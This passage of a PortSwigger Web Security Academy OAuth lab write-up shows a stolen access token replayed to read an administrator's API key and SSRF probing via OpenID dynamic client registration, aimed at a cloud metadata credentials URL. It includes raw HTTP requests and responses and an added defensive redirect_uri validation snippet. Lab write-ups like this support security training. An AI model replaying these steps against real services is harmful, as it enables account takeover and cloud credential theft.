  }
</script>

The key information arrives:
/?access_token=92sK4CuiUCtdk9VvkVR7HmQeh_JklJA2NN1Nod35Pu-&expires_in=3600&token_type=Bearer

  5. Find the final /me request and replace the bearer token in it
GET /me HTTP/1.1
Host: oauth-ac031fdd1e29cc34c07079ff028e00f7.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net/
Authorization: Bearer 92sK4CuiUCtdk9VvkVR7HmQeh_JklJA2NN1Nod35Pu-
Content-Type: application/json
Origin: https://ac2b1f881e04cc62c048795500be00cf.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close


This returns the admin account's details:

{"sub":"administrator","apikey":"7ro4jbKbsgvgSX7hFm30Gs7jJTY9MJQB","name":"Administrator","email":"administrator@normal-user.net","email_verified":true}
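Labs 3 and 4 both succeed because the authorization server accepts a redirect_uri it did not register, and lab 4 additionally needs the client's open redirect. As an added example (not code from the original post or the labs), the Node.js snippet below shows the two fixes: on the authorization server, an exact string match of redirect_uri against the registered list, with the extra requirement that the supplied value equals its own normalized form so that `../` traversal cannot slip past; on the client, a `/post/next?path=` handler that only ever redirects to a same-origin path. The client registry, client id and origins are constructed for the demo.

```javascript
// Constructed client registry: client_id -> exact redirect URIs registered.
const registeredClients = new Map([
  ['demo-client', ['https://client-app.example/oauth-callback']],
]);

// Authorization-server side. Only an exact string match against the registered
// list is accepted, and the supplied value must be identical to its own normalized
// form, so "/oauth-callback/../post/next?path=..." (which the URL parser resolves
// to "/post/next?...") and "oauth-callback../post/next" are both rejected.
function validateRedirectUri(clientId, supplied) {
  const allowed = registeredClients.get(clientId);
  if (!allowed || typeof supplied !== 'string') return false;
  let parsed;
  try {
    parsed = new URL(supplied);
  } catch {
    return false;
  }
  if (parsed.protocol !== 'https:' || parsed.hash !== '' || parsed.href !== supplied) return false;
  return allowed.includes(supplied);
}

const CLIENT_ORIGIN = 'https://client-app.example'; // assumed client application origin

// Client-application side: the /post/next?path=... handler must only send the
// browser to a same-origin path. Anything else falls back to the home page.
function safeNextPath(path) {
  if (typeof path !== 'string' || !path.startsWith('/') || path.startsWith('//')) return '/';
  let target;
  try {
    target = new URL(path, CLIENT_ORIGIN);
  } catch {
    return '/';
  }
  // Resolving against our origin exposes tricks such as "/\evil.example" that
  // browsers treat as a new authority.
  if (target.origin !== CLIENT_ORIGIN) return '/';
  return target.pathname + target.search;
}
```

Exact matching (rather than prefix or pattern matching) is what RFC 6749 recommends for redirect_uri, and it also removes the second problem from consideration: with it in place, the client's open redirect is still a bug worth fixing, but it can no longer be used to move a token off the registered callback.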

5. Stealing OAuth access tokens via a proxy page
  • Goal

Find an open redirect vulnerability in the client application, use it to obtain admin's access token, and submit admin's API key.
Test account wiener:peter

  • Approach

Omitted for now.

6. SSRF via OpenID dynamic client registration
  • Goal

Use SSRF to obtain the secret access key stored at http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/
Test account wiener:peter

  • Approach
    1. Probe the default public paths to find the OAuth client registration endpoint:

https://<OAuth server>/.well-known/openid-configuration
Eventually found: https://oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net/reg

  2. Construct a request to test dynamic registration of an OAuth client
POST /reg HTTP/1.1
Host: oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net
Content-Type: application/json
Content-Length: 59

{
	"redirect_uris" :    [
			"https://example.com"
	]
}

The response shows that registration succeeded:

HTTP/1.1 201 Created
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: application/json; charset=utf-8
Date: Thu, 26 May 2022 21:50:40 GMT
Connection: close
Keep-Alive: timeout=5
Content-Length: 874

{"application_type":"web","grant_types":["authorization_code"],"id_token_signed_response_alg":"RS256","post_logout_redirect_uris":[],"require_auth_time":false,"response_types":["code"],"subject_type":"public","token_endpoint_auth_method":"client_secret_basic","introspection_endpoint_auth_method":"client_secret_basic","revocation_endpoint_auth_method":"client_secret_basic","require_signed_request_object":false,"request_uris":[],"client_id_issued_at":1653601840,"client_id":"iY5mnwgiJllrLS-Z2GJC8","client_secret_expires_at":0,"client_secret":"A8nOzvLB-czgTiYgLxLYcZhTwVD-yI3Vky2UebY44ChL2L-yFf4l55VnKQPzPP1KRKgA2nC6OV1lmOWWl_iQow","redirect_uris":["https://example.com"],"registration_client_uri":"https://oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net/reg/iY5mnwgiJllrLS-Z2GJC8","registration_access_token":"lJqCBOE8Su4OY9SAcF0WwGg-9K85IylOIPDhlVr2tRH"}

